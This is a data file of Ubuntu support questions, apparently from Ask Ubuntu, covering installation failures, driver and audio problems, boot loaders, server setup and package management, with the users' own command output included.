179144	how to get ubuntu installed after deleting windows and with no other os present ?	i spent the night trying to get rid of my windows xp operating system and around midnight i discovered a way to get rid of it . the problem is while i did get rid of the operating system , i had n't yet found a way to get ubuntu to do a proper download and install . so my dilemma is that i now have a laptop that when turned on says operating system not found . any ideas ? ps i did try pendrive linux to download it and attempted to install it with the cd . the night before i did try and do it directly from the website but it kept getting interrupted .
179146	ubuntu 12.04 dash home looses apps frequently	i have tried the various suggested fixes , some of which did nothing , others seemed to fix the problem for a day or two but it soon returned . dash home simply shows recent files and downloads no apps at all . can anyone help please .
179147	access dbus session bus from upstart script	i was wandering if it is possible to access the dbus session bus from within an upstart script . the background is this : i am running an upstart task in user mode and replaced the upstart.conf dbus configuration file with the one from the upstart bzr repository . now it would like to access the gnome keyring within that tasks script using gkeyring , which needs to access the users upstart session bus . by default , i just get the gnome keyring not available . when i try to export dbus_session_bus_address= ... within the upstart script , the script/initctl command just hangs , no output anywhere . this leads me to believe that since upstart uses dbus as well , using the session bus is problematic . does someone have an idea to resolve this ?
179148	set default user session to xfce4	how do i set the default user session to xfce4 ? i have tried : sudo /usr/lib/lightdm/lightdm-set-defaults -- session xfce sudo /usr/lib/lightdm/lightdm-set-defaults -- session xfce4 sudo /usr/lib/lightdm/lightdm-set-defaults -- session xubuntu-desktop i am using xrdp and do not have access to the normal greeter .
179154	system freezes with heavy disk usage - samsung series 9	i 've recently purchased a samsung series 9 and put ubuntu 12.04 on it . i installed ubuntu via the windows installer . everything mostly works great , other than the occasional system freeze . the system will freeze when copying large files to a different location on the same disk , or when performing any sort of heavy disk usage , like installing new packages from update manager . if i copy a large file to the windows partition from ubuntu , then everything works fine . i 'm assuming it 's related to the ssd . the ssd is ata sandisk 128gb . what can i do to resolve this ?
179155	how to force dolphin to not execute executable files	dolphin has a nasty habit to execute whatever executable file i accidentally click on . how to turn off this behavior ? is there anything like in nautilus which would allow to select appropriate action ?
179159	dual boot with windows 7 ( 3 partitions ) on an acer aspire one	i have an acer aspire one from the ao725 series , with a 320gb hard drive , preinstalled with windows 7 home premium . it has the following three partitions : sda1 ( ntfs ) 13958 mb - the acer recover partition sda2 ( ntfs ) 35 mb - the boot sector ? sda3 ( ntfs ) 306006 mb - the main partition for everything else what i thought of doing was making the 4th partition an extended partition , and then putting in three logical partitions - one for root : / one for home : /home , and one for swap . ( this way i get to keep the recover partition in case something happens to windows ) are there any problems with that ? ( for example , will i be able to use the recovery partition if i ever need it ? ) will a standard ubuntu installer with manual partitioning handle all this well , or do i need to do something special to prevent grub for overwriting the mbr badly ?
179160	is there a command to upgrade a package and all its dependencies without upgrading all packages ?	we have a meta-package , similar to ubuntu-desktop , that requires a bunch of dependencies to run some internal , not-yet-packaged code . currently we are updating the meta-package so that it requires > = the current version every time we repackage it so that its dependencies will be upgraded when it is installed . however , if there was a way to upgrade a package and all its dependencies without upgrading all packages then that would be much simpler . is that possible ?
179162	laptop shut down during installation of ubuntu 12.04	i started installing ubuntu 12.04 on my gateway laptop , to replace windows 7 that already was on it . sometime during the installation the computer shut down due to my niece pressing the power button , because she thought i left it on and forgot . i 'm guessing it got as far as deleting windows before the shutdown . now it boots up , shows the gateway startup screen then goes blank except for the cursor in the upper left corner . i ca n't seem to get the cd to load , i hear it run but nothing else , and i ca n't figure out how to have it boot from the cd as i just got this thing . obliviously i messed up the program files badly , how do i fix it correctly ? is there another version of ubuntu i can install that will fix this and turn this back into a working laptop instead of a brick ? i 'd appreciate your help . thanks .
179164	cloud access by a group	i have a group of people who want to access and drop files in the ubuntu one folder . i crudely gave everyone my id and password to access the files , but there must be a more elegant way for anyone at any time to access or deposit files in the cloud storage . how do i get each individual access from their own computer ?
179167	possible drag and drop files from windows 7 virtual machine in vmware ?	i currently have a win7 x64 bit appliance . vmware is installed on ubuntu 12.04 . i 'm using vmware 4.0.4 . i was told by a friend that you can drag and drop files from vmware straight onto the ubuntu desktop . is this actually possible ? if so do i have to install anything to get this working ? or is suppose to work out of the box ?
179169	sound trouble with hp pavilion dv6	woke up this afternoon only to find that something happened to my laptop while my brother was using it . the startup sound plays normally when i turn it on , but other than that no audio will work from what i can tell . is there any way to fix this ? i 'm still relatively unfamiliar with all of the specs of my laptop , so i 'd need a detailed walkthrough of the fix . i 've had this thing for just under a year and this is the first time this has happened , if it helps any . edit : it seems i still get sound when i use headphones , but without them there 's still nothing .
179170	ordinary use . is gfx memory the culprit ? problems with 128 mb gfx memory	i have noticed when on my laptop using an external screen+laptop screen , the terminal gets corrupted and responds really slowly ; several bug reports and questions here are having the same symptoms . the `` terminal '' is a window with terminal or byobu . in the laptop i have a dedicated nvidia ( it is a t60 laptop ) , 128 mb of memory . because of one of the comments on one of the bug reports i was able to check the amount of ram free on the gfx card , with one browser and one terminal the pressure on the card was at 119 out of 128 mb . ( gnome3 ) . starting more apps ment less free ram . i ca n't grade or evaluate the validity of the bug reports so i 'm not linking any of them . the search terms i used was `` terminal sluggish corruption '' . is the graphics card available ram the culprit here ? lspci -nn : http : //paste.ubuntu.com/1169472 dmesg : http : //paste.ubuntu.com/1169473 the desktop display spans 3360x1200 . i 'm currently using gnome3 . i find that unity displays the same erroneous behavior , while unity2d does not .
179171	audio glitches occur randomly	audio in media files randomly glitches and sometimes repeats for 1-2 seconds and then continues playing normally . these glitches seemingly happen at random times and do n't recur in the same part of the audio tracks . these glitches did not occur on fedora 17 nor on windows so there is nothing wrong with the hardware nor the files themselves . tested on various media players . i 'm trying to fix this problem by installing the same audio drivers/software as fedora has , but i do n't know where to start . edit : i 'm using gnome 3 and i 've found another audio-related glitch . it occurs when the mouse is moved to the top left corner and all the open windows are shown or when the start key is pressed ( the same `` gnome menu '' opens ) . these glitches are not of the same nature but this never happened on fedora 17 either . lshw -c multimedia *-multimedia description : audio device product : gf110 high definition audio controller vendor : nvidia corporation physical id : 0.1 bus info : pci @ 0000:01:00.1 version : a1 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:17 memory : faffc000-faffffff *-multimedia description : audio device product : 6 series/c200 series chipset family high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 05 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:48 memory : fbff8000-fbffbfff aplay -l **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : alc889 analog [ alc889 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 1 : alc889 digital [ alc889 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 7 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 8 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 9 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 lspci -v | grep -a7 -i `` audio '' 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) subsystem : giga-byte technology device a102 flags : bus master , fast devsel , latency 0 , irq 48 memory at fbff8000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 01:00.1 audio device : nvidia corporation gf110 high definition audio controller ( rev a1 ) flags : bus master , fast devsel , latency 0 , irq 17 memory at faffc000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 02:00.0 ide interface : marvell technology group ltd. device 917a ( rev 11 ) ( prog-if 8f [ master secp seco prip prio ] )
179176	no wireless connection at all	i downloaded 12.04 and i 'm new with linux . i ca n't connect to the internet and my wifi does n't even show up , in fact no wireless connections show up . it wo n't even give me the option to connect to the internet . i 'm on my hp mini laptop ... please help
179177	how can i add sites for subdownloader or smplayer to search in ?	i am new in linux . i have installed ubuntu with wubi three days before and i have not opened my windows all these days . the only thing i miss is the ability of bs.player to find subtitles . i have tried to install bs.player with wine , but it does n't work . i have downloaded smplayer and subdownloader but they can not find subtitles in my language ( greek ) . in smplayer it says it searches on opensubtitles.org . how can i add some more sites in which it can search , like bs.player did ? please help me , i do n't want to use windows again .
179183	how to install boinc client/manager ?	i am trying to install the boinc client/manager which is a .sh file , so i can contribute to the world community grid . i installed the version that is in the software centre , but it is 2 versions behind , so i was wondering how i can install the current version ( which i have downloaded to my computer ) . any help would be great .
179187	black screen after usb installation of ubuntu	i just installed 12.04 lts on my toshiba satellite a135-s7403 laptop using a flash drive . the installation went perfectly , i replaced windows 7 with the ubuntu version and deleted all the old partitions on the hard drive . however , after being prompted to restart , all i get is a black screen with the flashing underscore after bios . i have an intel graphics media accelerator 950 for my graphics card . please help .
179193	can ubuntu backup my windows 7 files ?	i have a problem with windows 7 . all efforts to fix it have failed . someone suggested i install ubuntu and backup my windows files . are there instructions available somewhere ?
179196	rename files inside a folder in real time	is there a way to rename files inside a folder as they 're created ? i could run a cron job every few seconds to do something like ... find . -name `` file . * '' -exec sh -c 'echo mv `` $ 1 '' `` $ ( echo `` $ 1 '' | sed s/file.*\ $ / '' file- $ ( date ) . * '' / ) '' ' _ { } \ ; but this seems really cumbersome , cycle-wise ...
179199	what does ' ( single quote ) do in the terminal ?	if i type ' ( single quote , next to the < enter > button ) in the terminal and then press enter it drops to a > prompt . what exactly is this , what 's it used for , and what type of commands can i enter here ? i can < ctrl-c > out of it but that 's all i got .
179201	partition scheme on ssd and hdd	i am reformatting my laptop but i am not sure how to setup my partition . i have a 120gb ssd and a 320gb hdd . i was planing to setup / on the ssd and /home on the hdd . will placing my /home on the slower hdd impact the performance of my system ? should i instead use symbolic links for music/video/data from the home folder to the hdd ?
179202	packaging with cdbs : unknown sequence cleanbuilddir	i 'm trying to create an ubuntu package for testing , and stick to the rules given at https : //wiki.ubuntu.com/packagingguide/complete . as this is cmake build and i need to adapt the arguments to cmake , i 'm using include /usr/share/cdbs/1/class/cmake.mk in debian/rules . unfortunately , when i then call debuild i get the error message $ debuild [ ... ] dh cleanbuilddir dh : unknown sequence cleanbuilddir ( choose from : binary binary-arch binary-indep build build-arch build-indep clean install install-arch install-indep ) make : *** [ cleanbuilddir ] error 255 dpkg-buildpackage : error : fakeroot debian/rules clean gave error exit status 2 debuild : fatal error at line 1350 : dpkg-buildpackage -rfakeroot -d -us -uc failed where is cleanbuilddir defined , or : why does it fail here ?
179205	embed web app into a desktop application	is there a way to embed a website/web app inside a application package ? ( something similar to phonegap but for linux distros )
179209	what are the gpg signatures	looking at questions like this , this and this i ask for public knowledge the following questions : what are the gpg signatures for ? what additional level of security do the signatures add or provide to users ? what are some of the common problems associated with gpg signatures with ppas in launchpad and why are they produced ?
179210	using ftp with a shared windows folder	i started to use ubuntu two weeks ago , i still have some difficulty in understanding the whole world of linux . i 'm in front of the following scenario : i have a windows computer running 12.04 in a virtualbox , i 've installed in ubuntu samba and proftpd , because i 've limited the ubuntu hd to 8gb . i had the idea to use a shared windows folder to use as my main ftp storage place . in /etc/fstab i 've added the following line //192.168.0.10/d $ / /mnt/ftp cifs user , umask=0022 , gid=0 , uid=0 , suid , username= '' # # # # '' , password= # # # # # 0 0 i can mount my partition with mount /mnt/ftp , i can access , but i can not create anything in the directory . the permission of the directory is dr-xr-xr-x 0 root root . i want to have the permissions , but how can i do it ? was my fault to not test direct by linux before posting , i 've verified if i could create or change anything direct in ssh while i was writing , first of all i 've tested using ftp . i 've tried right now to chmod -r 777 /mnt/ftp , and i got permission denied error , i 'm logged in my virtual linux with ssh . i 've unmounted the /mnt/ftp and i could chmod 777 the folder , but the permission of the containing files inside the /mnt/ftp still dr-xr-xr-x . and ca n't change their permissions . how can i solve this problem ?
179211	call to undefined function sqlite_open ( ) in cli mode	12.04 amd 64 apt-get install sqlite php5-cli php5-sqlite php -r ' $ x = sqlite_open ( ) ; ' php fatal error : call to undefined function sqlite_open ( ) in command line code on line 1
179213	how can i get seahorse passwords and keys to read-in passwords from $ home/.gnupg ?	after reinstalling my system , i copied the .gnupg folder from backup into my new home folder . unfortunately , seahorse does not read-in the passwords from that folder . it does pick-up the ssh keys from the .ssh folder and the certificate keys from .gnupg . with a previous reinstall , it did pick-up the passwords .
179214	nvidia driver for toshiba p850	i have tried over and over installing the latest drive for my 630m on ubuntu 12.04 but all it succeeds in doing is changing my resolution and i have to remove it again , the laptop came with both a chipset graphics and the gpu but will only recognise the chipset any advise ?
179215	why ca n't i install ubuntu or wubi on a windows dynamic disk ?	i 've been trying to install 12.04 for a while now , i 'm running on windows 7 and i already made the partition ( it 's dynamic ) . i 've tried booting from a disc and also the windows installer . i have n't tried used any repair-boot programs or anything . every time i tried to load from either , i get an error : command=c : \windows\sysnative\bcdedit.exe /set { 03f9077f-661f-11e1-845a-d08b36406c3d } device partition=u ; retval=1 stderr=an error has occured setting the element data . the request is n't supported stdout= then after that , it makes a log file with information that i do n't understand . if it is simply due to the fact of it being a dynamic partition , someone please help . if it is more extensive , anyone with details on possible solutions or definite ones please express them .
179218	how do i configure the various services available on ubuntu server ?	i 've installed 12.04 ( server ) . i 'm now trying to configure web sites , emails , services , etc . how do i do this ?
179226	allow port 80 into ubuntu	i 'm trying to create a basic web server . i am running ubuntu 12.04 desktop . i have installed lamp and set up html files , and when i open a browser and navigate to 192.168.1.95 ( static internal ip of my server ) , or 192.168.2.2 , the modified index.html file that came with apache2 appears on screen . the problem is with connecting through internet , rather than intranet . i have used a cell phone ( wifi disabled ) to connect through the cell network , as well as giving my external ip to a friend , and asking him to try to open the site . each time , however , we receive error 502 bad gateway - response error , a bad response was received from another proxy server or the destination origin server . let me say that i have already gotten disabled the remote configuration option in my router , so that 's not the problem , and i have already forwarded port 80 through my router . yes , i 'm pretty sure i did it right . in fact , to test that the router was n't the problem , i connected my server directly to my modem , which does not have an internal router , and still got the same error . a google search has told me that my isp ( centurylink ) does not block port 80 , and that others with the same isp have been successful in hosting their own sites from home . obviously i 'm not very knowledgeable about this subject , but from my understanding , i 've ruled out everything except the server , which means that something is either blocking port 80 on the way in , or the data is never making it back out . my question is this : is there something ( firewall , etc . ) in ubuntu that could be responsible for such an error ? i have already enabled , disabled , and opened holes through ufw , and that has n't made a difference . one tutorial i read suggested that apparmor could be a problem , and they suggested that it be uninstalled , so i followed their instructions on how to do so , but i have noticed that there is still an apparmor folder in /etc/ , so i 'm not exactly sure what all got done . if there is any other information you could give me , i would truly appreciate it . in the event that i overlooked some blatantly obvious solution , i 'm really sorry to bother you all , but it has n't been for lack of effort ; i 've been working on this for the vast majority of the past two days ... also , i 'm not sure if it makes any difference , or if this is actually related , but i 'm having the same problem with ssh ; i can ssh into this system over my local network using username @ local_ip , but i ca n't get it to work over a non-local network ( yes , i do realize that i need more than just a local ip ) maybe this helps narrow down the problem , then again , maybe not ... thanks in advance for your time and support ! ! !
179227	firefox completely consuming the os	over and over again , when using firefox browser , a window pops up with the message : unresponsive script : xpcomutils.jsm:357 which is normally followed by another popup window stating nspropmpter error . the thing is , the entire operating system becomes unusable . completely unusable ! cairo ( glx dock ) cpu meter slams to the hilt , the mouse is unresponsive , and the hard drive led stays constantly lit . this can go on for 5 to 10 minutes . sometimes it takes 5 minutes for the window to pop up asking to stop the script . the entire operating system is unusable at this point . why is a browser script slamming my hard drive like that ? a browser script should not be hitting the hard drive . this is a very serious issue that ubuntu needs to address with firefox . it renders the entire operating unusable . $ locate xpcomutils.jsm /home/grpace/.wine/drive_c/windows/system32/gecko/1.0.0/wine_gecko/modules/xpcomutils.jsm i have a dual-boot with ubuntu 12.04 and win xp . they are on separate hard drives . i do n't use xp anymore unless absolutely necessary . however , fstab loads those windows partitions on ubuntu startup . how is firefox or a possible firefox plugin running on ubuntu accessing the windows partitions on a separate drive ? quite peculiar . what plugin would decide to install itself using wine and on a completely separate drive ?
179230	how can i manage multiple administrators with juju ?	i manage some deployments with juju . however i am not an island , i have coworkers who also want to manage shared environments . i know i can use the following stanza in ~/.juju/environments.yaml to give people access to my juju environment : authorized-keys : [ and then put their ssh ids in here ] what other best practices are available to manage multiple environments with multiple system administrators ?
179232	x201 tablet touch screen works like touchpad and not touch screen . stylus works however	when ubuntu 12.04 starts on my x201t the touchscreen works fine , i can touch anywhere and the mouse will appear there . however once i log in to the desktop the touchscreen starts acting like a touchpad . if i touch the screen it acts like a permanent left click , and if i move my finger on the left side of the screen with the mouse on the right , it will follow my motions with a slightly larger motion , much like a touchpad on high sensitivity . touching in random locations does not make the mouse appear ( or jump to a new location like a miscalibrated screen ) . any ideas ?
179235	ubuntu wo n't boot amd fx 6100 & asus radeon 6670	after i install ubuntu 12.04 and reset i get the ubuntu loading screen which is offset and then the desktop appears without any icons and still offset . i ca n't do anything from this point except turn off the machine or reset . i am installing on a blank machine with no other os installed . asus m5a99x evo motherboard amd fx 6100 processor asus radeon hd 6670 8 gb ram
179239	how to replace my desktop with a full-size web-browser window ?	i wish to replace my current desktop view with a web-browser view of a specified url and still be able to open more windows of whatever application i so choose ; how would one go about accomplishing that ? i am comfortable with the command line and have programming experience , but a barebones solution would be most appreciated . i found this related question , but i 'm not sure if that 's the right direction to go . any geniuses ?
179240	how do i limit the upload speed of transmission client to below 5kb/s ?	i want to restrict the upload speed of my transmission client to 1kb/s , is it possible ? what changes do i need to make to lower the upload speed ?
179241	what makes ubuntu harder for viruses to infect	one question i get asked a lot is why there are no viruses on ubuntu ( linux in general ) . even though it is possible to infect it and a small amount of low level bugs have appeared , i wanted to point out the key elements that make it very tough for viruses and malware in general to infect ubuntu as easy as in windows , specially the 2 most common effects which are : the action of infecting a computer the action of propagating to other computers . using the common characteristics of a virus which are : attaching/modifying a file attaching/modifying a process so why is it so difficult for a virus to infect ubuntu ? . why is it so difficult to infect the most known parts of ubuntu for example : the kernel default packages ppa packages other packages ( website deb package , source )
179244	unable to format usb 1204 [ daemon inhibited ]	i try to format my usb 1st time its work all data gone but i ca n't save any file at this usb . then i try to check is it working or broken here the report santos @ santos : ~ $ sudo badblocks -v /dev/sdb [ sudo ] password for santos : sorry , try again . [ sudo ] password for santos : checking blocks 0 to 7824383 checking for bad blocks ( read-only test ) : 0.00 % done , 0:00 elapsed . ( 0/0/0 errdone pass completed , 0 bad blocks found . ( 0/0/0 errors ) santos @ santos : ~ $ sudo badblocks -v -w /dev/sdb [ sudo ] password for santos : sorry , try again . [ sudo ] password for santos : /dev/sdb is apparently in use by the system ; it 's not safe to run badblocks ! santos @ santos : ~ $ how to format and fix this issues ? i have read this link formatting pen drive causes 'daemon is inhibited ' error and it said like this when i try to move any items from desktop `` the destination is read only also in this case i use google and find this http : //ubuntuforums.org/showthread.php ? t=1955353 article as same its not helped following user13509 suggestion .. while im check my chmod setting for the usb .. i found it like this santos @ santos : /media $ sudo chmod -r 777/media/new\ volume chmod : missing operand after 777/media/new volume ' trychmod -- help ' for more information . root @ santos : /media # ls -l total 4 drwx -- -- -- 3 santos santos 4096 jan 1 1970 new volume
179245	why ca n't update manager find any updates ?	my update manager does not find any updates . it does not crash or anything , but no update for my ubuntu , except for the ppas . at first i thought there really was no update out there , but now it has been more than a month since my last update . what is wrong here ? $ cat /etc/apt/sources.list deb http : //ir.archive.ubuntu.com/ubuntu/ precise main restricted universe multiverse ( i also tried the mainservers , but still nothing . ) http : //paste.ubuntu.com/1162185/
179248	unity wo n't suspend on inactivity	running 12.04 . i can manually suspend the system and wake it up again , but i ca n't get it to suspend on inactivity automatically . i have it set to `` suspend when inactive for '' 10 minutes in systems settings > power . it just blanks the screen , but does not suspend . info as requested . left system untouched at 18:30 with suspend set to 10 minutes . kern.log and dmesg had nothing new in them . sys.log had these extra lines aug 23 18:34:26 ubuntu-desktop aptdaemon : info : quitting due to inactivity aug 23 18:34:26 ubuntu-desktop aptdaemon : info : quitting was requested aug 23 18:39:01 ubuntu-desktop cron [ 3228 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete )
179250	how do i boot from my ubuntu partition ?	i burned the latest ubuntu iso on a disk , i partitioned my ssd and installed it . after downloading all the packages and everything it asked me to reboot and take out my cd , then press enter . i did that . when it rebooted it started windows , so i restarted my computer again and hit f11 to bring up the boot options , but the ubuntu was n't there . what do i do ?
179252	how to use postfix 's pipe to auto-reply for non-existing accounts	consider the following scenario : 1 ) somebody ( somebody @ somewhere.net ) sends an e-mail to address- < id > @ myhost.com where < id > is an arbitrary number . address- < id > is not an existing account on myhost.com . 2 ) myhost.com will send back an auto-reply to somebody @ somewhere.net 3 ) in the body of the auto-reply message < id > will be used . how can i implement this using postfix 's pipe on myhost.com ?
179255	ubuntu text ticker ( scrolling text )	is there any application to display scrolling text on top of all windows in ubuntu ? something like tickr , but what i want is an application that can display my own text , something like appname `` my own text '' then `` my own text '' is scrolling around the desktop . can tickr do that instead of rss feed ?
179256	how do i install a fortran 77 compiler ?	i have just installed 12.04 lts on my laptop and i 'm kinda new in this . i am required to write some program in fortran 77 and i need a fortran 77 compiler . i have tried installing g77 as described in the ubuntu website but was unable to do so . i have typed in the following in terminal : sudo apt-get install g77 and get the following : reading package lists ... done building dependency tree reading state information ... done package g77 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'g77 ' has no installation candidate may i know what is the problem ? i have tried searching g77 in the software center but apparently it is not there . does this mean it is not available for 12.04 ? i 'm currently using an asus k43s laptop with intel core i5-2450m processor and my ubuntu is installed alongside windows .
179260	bluetooth not working properly once restarted via hardware switch	i usually switch off my bluetooth to conserve the charge while working . but when i want to use bluetooth again and i switch on the bluetooth back on its not showing available devices like my phone and i am unable to connect my phone to the system by bluetooth . this can be changed only by restarting the computer . can any one suggest a corrective measure please ? i use ubuntu 12.04 .
179263	samsung 305u notebook wo n't resume after suspension	i 'm having trouble with my samsung 305u notebook suspending , both when inactive or when i close the lid . i read it is a video driver problem , so i uninstalled the proprietary driver from system settings- > additional drivers and the problem was solved . since i need to have video drivers installed , i got the catalyst suit drivers from amd . i think i got them installed correctly since when i put fglrxinfo in the terminal the result is : display : :0.0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 6320 graphics opengl version string : 4.2.11762 compatibility profile context the problem is that when i install the catalyst suite the suspension problem comes back again . the only difference i could perceive is that when the drivers are uninstalled and the notebook goes to suspension it does n't completely turn off , and when the drivers are installed the notebook turns off and i have to press the on botton , after i do this it sound like it 's on but the screen remains black . any suggestions ?
179265	how to logout of ubuntu one using oauth url ?	i am new to ubuntu one , and i have implemented ubuntu one oauth to access data via the ubuntu one api using oauth 1.0a and its works fine for me . but how can i logout from ubuntu one using oauth url ? i am trying to search inside documentation of ubuntu one site , but i ca n't get solution . i am trying to find the url that i request to server and server logout currently login user and send back success logout response to my website . any ideas on how to do this ?
179272	ubuntu updates problem	i am getting this problem , i just newly installed ubuntu sbidwai @ esspc05 : ~ $ sudo apt-get upgrade [ sudo ] password for sbidwai : reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : hplip hplip-data libhpmud0 libsane-hpaio linux-generic linux-headers-generic linux-image-generic printer-driver-hpcups printer-driver-hpijs update-notifier update-notifier-common 0 upgraded , 0 newly installed , 0 to remove and 11 not upgraded . sbidwai @ esspc05 : ~ $
179273	can i install wubi on a logical partition ?	my hard disk has 4 partitions : system ( primary partition ) c : ( primary partition 200 gb ) f : ( logical drive 246 gb ) d : recovery ( primary partition 20 gb ) can i install 12.04 by wubi installation method on the logical drive ? if yes , can i shrink the remaining free space in f : drive to make another drive ?
179277	lamp : apache not accepting `` index.php '' files and displaying directory listing	i just installed lamp here on my desktop . i am using 12.04 . installation works perfectly but when i tried to access localhost/wordpress/ it doest read the index.php . it shows like this : why is it happening ? why my localhost doesnt read the index.php ? i tried to create a dir and put an index.php there but again it shows the whole listing of directory and ignore my index.php . please help . thank you
179278	how to sync email client between ubuntu and windows for seamless use of mails and archives	i am looking for an email client which offers seamless integration of ( offline ) mails when used from linux ( ubuntu 12.04 ) and windows 7 . being a windows user till now , i have been using outlook and have couple of accounts configured in it , and then there are some backup .pst files created using outlook in windows . going forward , i would be using linux most of the time and was wondering if there are good clients which work like outlook - offering offline viewing of emails , and backing up in formats like pst . i know linux maynot use pst to backup email files , but was wondering if this can be achieved . basically , i will be using mail client most of the time in ubuntu to read and archive emails . now , when i log into windows for other work , i want to be able to access the same offline mails and archive emails from there as well , and any new mails that i download/send from within windows should be synchronised so that when i log in to ubuntu later i can easily resume with email works without any additional sync . hope the requirement is clear . please suggest a mail client compatible for such use with both ubuntu and windows . cheers !
179281	ubuntu does n't remember my keyboard layout options after reboot	recently ubuntu 12.04 have started not to remember my keyboard options - as image http : //img.ivanovs.info/xknu0a.png i always use caps lock to change my layout , and it used to work fine before . but now when i log in , changing it with caps lock does n't work . i have to go to options , deselect `` caps lock '' , select it again , and then it starts to work . what may cause this problem ? thanks in advance .
179282	are there human interface design guidelines for unity development ?	i was surfing developer.ubuntu.com , searching for unity-human-interface-design-guidelines or a unity-hig , but i did n't find anything . i 've seen design.ubuntu.com , but that 's not what i 'm talking about . has canonical provided human-interface-design-guidelines ( hig ) for unity apps ? if not , they should ! this is important if we want to have consistent and high-quality applications for our platform . apple , microsoft and google have all provided such guidelines for developers of their respective platforms . gnome has also provided an hig-book for their developers . i hope this message reaches the guys at canonical .
179283	can i create a liveusb from ubuntu 12.04 without having the original iso file ?	i have 12.04 installed but i would like to create a 12.04 .iso file to put on a usb and run ubuntu 12.04 of that . i do not want to download the whole 700mb+ file . any help ?
179286	grub2 bootloader display menu at each reboot	i have several problems with my ubuntu 12.04 , which i think interrelated . my first problem is that recently my kernel got updated to 3.2.0-29 ( i 'm not sure whether it was just generic or generic-pae ) . since then my virtual box was not loading displaying an error code kernel driver not installed ( rc=-1908 ) . so , i tried many work arounds , suggested in several threads with no use . i tried to remove , reinstall virtualbox from different sources , no use . when i looked at my synaptic and found that old kernels to be present ( 3.2.0-27 & 26 ) . in the event of removing them , thinking that they may be causing problem with virtualbox , i accidentally removed my all the kernels , so i couldnot boot . hence i followed method adviced in this thread how to restore a system after accidentally removing all kernels ? ( detail method ) . i did n't know which kernel to install . as my pc has more than 3gb ram , i used generic-pae . so now when i boot my computer everytime , i 'm prompted to grub2 loader menu asking which kernel to use . but i have only one kernel . it also asks whether i should repair kernel ( but repair doesnot work , it displays same menu again ) . i updated grub , but no use . i want to your help on this . i want my laptop to boot & load automatically . second is if i run virtual box it displays same error code , described earlier . if i run sudo modprobe vboxdrv the problem gets solved for this boot . but when i reboot , same problem with virtual box . i greatly appreciate your assistance on this . thanks in advance
179293	how to move 12.04 from usb to hdd ?	i recently installed the iso for 12.04 lts on a 4gb usb . i installed and started up ubuntu perfectly from my usb . now , i had to restart my computer and when i started it back on ( from usb ) it was practically a freshly installed ubuntu , with all of my files gone . can someone tell me how to avoid this problem ( start up the same way every time so i do not lose files ) ? or if there is a possible way to move the iso to my hdd and then start up from there every time ?
179294	graphical artifacts during installation with intel based graphics	i downloaded and burned the 12.04 ( 64bit ) desktop ubuntu image to a cd and booted to it . it gave me a visible desktop , but the interface is badly broken , with ghosting when dialog boxes are moved and blocky artifacts covering all text . i tried using the self verification tool ( boot , hold down a button for menu , select `` verify cd '' ) , which claims that the cd is fine . what can i try next ? i 'm using the intel hd 4000 integrated graphics . update : i just kept clicking `` next '' and hoping that the defaults would be acceptable . ubuntu finished installing , and i rebooted into the fresh install . the graphics artifacts appear to still be there , but i ca n't quite tell because all of the ui elements except for the desktop background disappear a few seconds after logging in , and i do n't know how to interact with the system . ( is there a hotkey to bring up a console ? ) update 2 : i did all of the above with 12.04 32-bit , with the same results . are there any known issues with ubuntu and intel integrated graphics ?
179308	ca n't launch applications , no windows , no launcher , nothing but a blank desktop	i unchecked unity tool bar from compiz , after that no windows and launcher are visible . also no applications are launching . i rebooted the system but no use . i can now see only a blank desktop nothing else . i am not able to launch even the terminal . the only thing that i can do is just right-click on the desktop and change the desktop background .
179311	where can i get games for ubuntu 's unity engine ?	i 'm new to ubuntu , but i installed it because windows gave me too many virus problems . i heard that unity is a cross-platform engine , so i can run good graphics games on linux . where i can get a list of good games that run on the unity game engine ? i have n't found any in the software center , nor on unity 's website . can you please point me to a list of good unity games ?
179315	cs : go on linux , steam client	can i run counter strike global offensive with steam client on my linux mint ? wine ?
179319	gnome icons load instead of suede	i 'm using lubuntu 12.04.1 on a 64bit machine . i 'm trying to change my icons to the suede set , but only the gnome icons load . i 've tried installing the suede theme manually by downloading it from gnome-look.org and extracting to /usr/share/icons/ and also by installing via synaptic . the preview in lxappearance of gnome and suede remain identical , and the icons used when applying the theme are as well . i tried editing the index.theme file so that suede would not inherit gnome by deleting the `` inherits '' line , but there was no effect . after every change i made , i would log out and back in or reboot to check . i even tried copying the desktop icon from suede to gnome and used the gimp to resize the file for each instance in gnome . this changed it in the lxappearance preview but not in pcmanfm 's side pane . i have not had the problem with other themes , only suede . has any one else had this problem ? and/or have a solution ?
